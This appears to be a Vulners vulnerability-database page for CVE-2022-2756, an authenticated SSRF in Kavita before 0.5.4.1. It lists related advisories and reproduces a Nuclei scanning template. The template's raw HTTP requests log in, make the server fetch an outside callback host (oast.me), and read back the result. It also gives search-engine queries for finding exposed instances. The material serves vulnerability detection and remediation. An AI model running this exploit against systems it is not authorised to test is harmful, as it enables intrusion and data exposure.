| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| Full Read Server-Side Request Forgery (SSRF) | 6 Aug 202215:05 | – | huntr | |
| CVE-2022-2756 | 10 Aug 202216:15 | – | attackerkb | |
| CVE-2022-2756 | 10 Aug 202220:26 | – | circl | |
| kavita 代码问题漏洞 | 10 Aug 202200:00 | – | cnnvd | |
| CVE-2022-2756 | 10 Aug 202215:15 | – | cve | |
| CVE-2022-2756 Server-Side Request Forgery (SSRF) in kareadita/kavita | 10 Aug 202215:15 | – | cvelist | |
| CVE-2022-2756 | 10 Aug 202216:15 | – | nvd | |
| CVE-2022-2756 Server-Side Request Forgery (SSRF) in kareadita/kavita | 10 Aug 202215:15 | – | osv | |
| Server side request forgery (ssrf) | 10 Aug 202216:15 | – | prion | |
| PT-2022-18483 · Kavita · Kavita | 10 Aug 202200:00 | – | ptsecurity |
id: CVE-2022-2756
info:
name: Kavita <0.5.4.1 - Server-Side Request Forgery
author: theamanrawat
severity: medium
description: |
Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks.
remediation: Fixed in 0.5.4.1.
reference:
- https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/
- https://github.com/kareadita/kavita
- https://github.com/kareadita/kavita/commit/9c31f7e7c81b919923cb2e3857439ec0d16243e4
- https://nvd.nist.gov/vuln/detail/CVE-2022-2756
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2022-2756
cwe-id: CWE-918
epss-score: 0.02298
epss-percentile: 0.81129
cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: kavitareader
product: kavita
shodan-query:
- title:"kavita"
- http.title:"kavita"
fofa-query: title="kavita"
google-query: intitle:"kavita"
tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader,vuln
http:
- raw:
- |
POST /api/account/login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
- |
POST /api/upload/upload-by-url HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Authorization: Bearer {{token}}
Content-Type: application/json
{"url":"http://oast.me/#.png"}
- |
GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{token}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- Interactsh Server
- type: word
part: header
words:
- image/png
- type: status
status:
- 200
extractors:
- type: regex
name: token
group: 1
regex:
- '"token":"(.*?)"'
internal: true
- type: regex
name: filename
group: 1
regex:
- coverupload.(.*?).png
internal: true
# digest: 490a0046304402203219d77468e45f0e19049dacf319c66b6086567f00bda923dbd58a109d644124022055ac6a2090f0597e9bc511aa559925ceb47d3e44fc0b1b23b643e580d4d3455d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation